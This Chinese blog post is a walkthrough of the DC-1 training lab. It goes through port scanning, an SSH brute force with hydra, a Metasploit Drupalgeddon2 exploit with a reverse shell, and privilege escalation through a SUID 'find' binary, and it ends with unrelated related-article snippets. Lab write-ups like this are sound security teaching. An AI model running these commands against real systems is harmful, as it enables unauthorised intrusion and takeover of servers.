OSCP系列靶场-Esay-DC-1

目录

总结

准备工作

信息收集-端口扫描

目标开放端口收集

目标端口对应服务探测

信息收集-端口测试

22-SSH端口的信息收集

22-SSH端口版本信息与MSF利用(pass)

22-SSH手动登录尝试(失败)

22-SSH弱口令爆破(爆破着玩)

80-HTTP端口的信息收集

信息收集-网站指纹

漏洞利用-网站指纹

其他端口的信息收集

漏洞利用-getwebshell

内网遨游-getshell

交互shell

FLAG1获取

权限提升

Linux提权-sudo提权尝试(失败)

Linux提权-suid提权尝试

FLAG2获取


总结

getwebshell → 发现CMS → MSF远程反弹SHELL

提 权 思 路 → 发现SUID-FIND → FIND提权

准备工作

  • 启动VPN
    获取攻击机IP > 192.168.45.167

图片

  • 启动靶机
    获取目标机器IP > 192.168.223.193

图片

信息收集-端口扫描

目标开放端口收集

  • Nmap开放端口扫描2次

    sudo nmap --min-rate 10000 -p- 192.168.223.193

sudo nmap -sU --min-rate 10000 -p- 192.168.223.193

图片


通过两次收集到的端口:→22,80,111,46232,53990

目标端口对应服务探测

通常udp端口测不出啥,主要探测tcp

# tcp探测

sudo nmap -sT -sV -O -sC -p22,80,111,46232,53990 192.168.223.193

图片

图片

信息收集-端口测试

22-SSH端口的信息收集

22-SSH端口版本信息与MSF利用(pass)

通过Nmap探测获得SSH的版本信息,可以尝试利用
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)


# 进入msf OpenSSH 6.0p1

msfconsole

# 搜索对应脚本

msf6 > searchsploit openssh 6.0p1

图片

22-SSH手动登录尝试(失败)

尝试root账户的密码爆破发现报错之后进行手动尝试

ssh root@192.168.223.193 -p 22

# 密码尝试

password > root

说明支持密码登录,但是密码不对

图片

22-SSH弱口令爆破(爆破着玩)

尝试root账户的密码爆破,利用工具hydra,线程-t为6

hydra -l root -P /usr/share/wordlists/metasploit/password.lst -t 6 -vV 192.168.223.193 ssh -s 22

在等待结果的同时让我们尝试使用另外的信息收集

图片

80-HTTP端口的信息收集

访问 http://192.168.223.193:80 发现是一个有名的CMS

信息收集-网站指纹
whatweb -v http://192.168.223.193:80

确认了CMS的版本信息 Drupal 7

图片

漏洞利用-网站指纹

既然确定了版本,直接上工具

msfconsole



searchsploit Drupal 7

查看了一下

图片

其他端口的信息收集

不需要啦~

漏洞利用-getwebshell

觉得还是远程执行的exp比较好

search Drupal 7

>use exploit/unix/webapp/drupal_drupalgeddon2

选一个时间靠后并且Rank比较高的

# 感觉只要设置攻击机以及监听端口,还有目标机器

show options
# 感觉只要设置攻击机以及监听端口,还有目标机器

show options

# 设置个反弹shell

show payloads

set payload 3
​​​​​​​

图片


# 配置MSF

set lhost 192.168.45.208

set lport 5555

set rhosts 192.168.230.193

set rport 80

run

成功getwebshell

图片

内网遨游-getshell

交互shell

由于获取的shell交互不友好,使用shell先获取shell

# 利用shell命令获取shell

meterpreter > shell

Process 4192 created.

Channel 0 created.

pwd

/var/www

whoami

www-data

# 利用python获取交互shell -> python失败使用python3

python -c "import pty;pty.spawn('/bin/bash')";

www-data@DC-1:/var/www$

图片

FLAG1获取​​​​​​​

www-data@DC-1:/var/www$ find / -name local.txt 2>/dev/null

find / -name local.txt 2>/dev/null

/home/local.txt

www-data@DC-1:/var/www$ cat /home/local.txt

cat /home/local.txt

******************

图片

权限提升

Linux提权-sudo提权尝试(失败)

查找具有sudo权限,且不需要密码的可提权文件​​​​​​​

# 利用sudo -l寻找

sudo -l

图片

Linux提权-suid提权尝试​​​​​​​

# -perm 文件权限

find / -perm -u=s -type f 2>/dev/null

图片


如果发现有东西的话 访问 https://gtfobins.github.io 寻找

图片

 
# 查找文件提权

find . -exec '/bin/sh' \;

提权成功

图片

FLAG2获取​​​​​​​

# cat /root/proof.txt

cat /root/proof.txt

****************

完结撒花~

申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,

所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.

图片

没看够~?欢迎关注!

免费领取安全学习资料包!

渗透工具

技术文档、书籍

 

面试题

帮助你在面试中脱颖而出

视频

基础到进阶

环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等

 

应急响应笔记

学习路线

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/168702.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

水库大坝安全监测系统守护水利工程安全的坚实后盾

WX-WY1 随着社会经济的发展和科技的进步,水利工程的安全问题越来越受到人们的关注。水库大坝作为水利工程的重要组成部分,其安全状况直接关系到周边地区人民的生命财产安全和生态环境。因此,建立一个高效、可靠的水库大坝安全监测系统至关重要…

【2021集创赛】NI杯三等奖:基于IECUBE-3100的高精度数模转换器设计及自动化测试方案

本作品参与极术社区组织的有奖征集|秀出你的集创赛作品风采,免费电子产品等你拿~活动。 杯赛题目:DAC芯片测试 参赛要求:本科生组 赛题内容: NIC公司最近正在竞争一个8bit DAC芯片设计的订单机会,需要按照甲方需求尽快提交芯片的设…

二百零四、Flume——登录监听窗口报错Ncat: bind to :::44444: Address already in use. QUITTING.

一、目的 Flume安装好后测试开启监听窗口44444,结果报错Ncat: bind to :::44444: Address already in use. QUITTING. 二、报错详情 Ncat: bind to :::44444: Address already in use. QUITTING. 三、报错原因 经过分析发现,44444窗口已经被占用 […

在UOS系统中编译CEF源码

一、下载cef代码 git clone gitbitbucket.org:chromiumembedded/cef.git 二、执行自动下载代码 由于chromium的代码很大,至少需要准备大概80G的硬盘!!!整个代码量太大还是多准备一些空间吧(强烈建议使用固态硬盘保存否…

如何在外部数据库中存储空间化表时使用Mapinfo_mapcatalog

开始创建地图目录表之前 您将使用EasyLoader在要使用的数据库中创建地图目录表。EasyLoader与MapInfo Pro一起安装。 (工具“DBMS_Catalog”不再随MapInfo Professional 64位一起提供,因为它的功能可以在EasyLoader工具中找到。) ​ 注&…

如何在MapInfo Pro中访问WMS数据?

从Web地图服务检索地图数据 将WMS服务器添加到MapInfo Pro后,用户可以从中检索地图数据。请记住,Web地图服务是一项新技术,您正在寻找的地图可能不适合所需的地理位置。 此外,所提供的数据由服务器确定。当将WMS数据作为工作空间的…

MODBUS转PROFINET网关TS-180连接西门子PLC和工业称重仪表

项目 随着科技的高速发展,工业自动化行业对日益多样的称重需求越来越高,上海某公司在国内的一个 工业自动化项目中,监控中心系统需要远程实时采集工业称重仪表测量的各种称重参数。该系统使用的是 西门子 S7-300 PLC,支持 PROFINE…

一书了解国产操作系统openEuler

操作系统是计算机之“魂” 数字化、智能化正在深刻地改变着我们的生活方式,也深刻地影响着世界格局。 支撑数字化、智能化的关键是数字基础设施,主要涉及数据中心、互联网、物联网、人工智能等新一代信息技术。 数字基础设施已成为保障产业格局、经济…

requests 技术问题解决流程:从问题重现到测试验证

在 #homedesign 项目中,用户 jimmysisonlucas 报告了一个bug。根据他的描述,他希望解决这个bug。然而,由于他没有提供详细的bug描述,我们无法确定具体的bug是什么。 问题的解决流程:从bug重现到测试验证 尽管我们没有…

Java爬虫框架下代理使用中的TCP连接池问题及解决方案

引言 当使用Java爬虫框架进行代理爬取时,可能会遇到TCP连接池问题,导致"java.net.BindException: Cannot assign requested address"等错误。本文将介绍如何以爬取小红书为案例,解决Java爬虫框架中代理使用中的TCP连接池问题&…

递归和分治

递归 递归(英语:Recursion),在计算机科学中,递归指的是一个函数在其定义中调用自身的方法。这种技术允许程序解决复杂问题,通过将它们分解为更小、更易管理的相似问题。递归通常与分治策略相关联&#xff…

Idea 2023.2.5配置(插件、Maven等)

IDEA2023.2.5配置 一. 插件Alibaba Java Coding Guidelines plugin supportMaven HelperMyBatisXSonarLintTranslationVuesion Theme 二. 自定义创建live template,快速写代码三. 修改全局配置3.1 Maven配置3.1.1 安装MavenStep1. 下载Step2. 安装Step3. 创建系统环…

论文阅读:“iOrthoPredictor: Model-guided Deep Prediction of Teeth Alignment“

文章目录 IntroductionMethodologyProblem FormulationConditional Geometry GenerationTSynNetAligned Teeth Silhouette Maps Generation ResultsReferences Github 项目地址:https://github.com/Lingchen-chen/iOrthopredictor Introduction 这篇文章提出了一种…

栈和队列

目录 1.栈 1.1栈的概念及结构 1.2栈的实现 2.队列 2.1队列的概念及结构 2.2队列的实现 1.栈 1.1栈的概念及结构 栈:一种特殊的线性表,其只允许在固定的一端进行插入和删除元素操作。进行数据插入和删除操作的一端称为栈顶,另一端称为栈…

重视日常消防巡检有必要,智能巡检系统来帮忙

近日,山西吕梁市永聚煤矿一办公楼发生火灾,造成重大人员伤亡,事故造成26人死亡、38人受伤。 是的,你没看错,煤矿公司、办公楼火灾、重大伤亡。第一反应,煤矿即使出事故也多为作业事故,居然还能在日常消防安…

“Python+”集成技术高光谱遥感数据处理

高光谱遥感数据处理的基础、python开发基础、机器学习和应用实践。重点解释高光谱数据处理所涉及的基本概念和理论,旨在帮助学员深入理解科学原理。结合Python编程工具,专注于解决高光谱数据读取、数据预处理、高光谱数据机器学习等技术难题,…

Chrome中设置安全来源域名

目的: 使得本地映射的域名能被浏览器安全访问,允许调用设备资源 步骤: 在Chrome中导航栏打开 chrome://flags/#unsafely-treat-insecure-origin-as-secure 填入hosts域名:如 http://h5-twzc003.local.com 参考: h…

AutoSAR CANIF层配置代码分析

CAN物理控制单元 配置: 生成的代码: CanIf_CtrlStates 解析 类型: typedef union CanIf_CtrlStatesUTag {CanIf_CtrlStatesType raw[3];CanIf_CtrlStatesStructSType str; }CanIf_CtrlStatesUType;typedef struct sCanIf_CtrlStatesType {C…

自定义歌曲试听SeekBar

看到这个效果,可能会想到完全自定义一个控件,其实我们在系统Seekbar的基础上,将progressDrawable中progress背景设为透明后,叠加绘制试听状态下的进度区域即可 class PlayerSeekBar JvmOverloads constructor(context: Context,a…

客服中心的客户关系管理核心功能

根据国外的调查,拥有客服中心的运营机构,可以保持85%左右的客户忠诚度,而接受过专业培训的客户中心可以将客户忠诚度提高到99%。客服中心作为客户关系管理的前沿,通过提供服务、实时沟通、搜集与分析客户信息、预测客户需求来提升…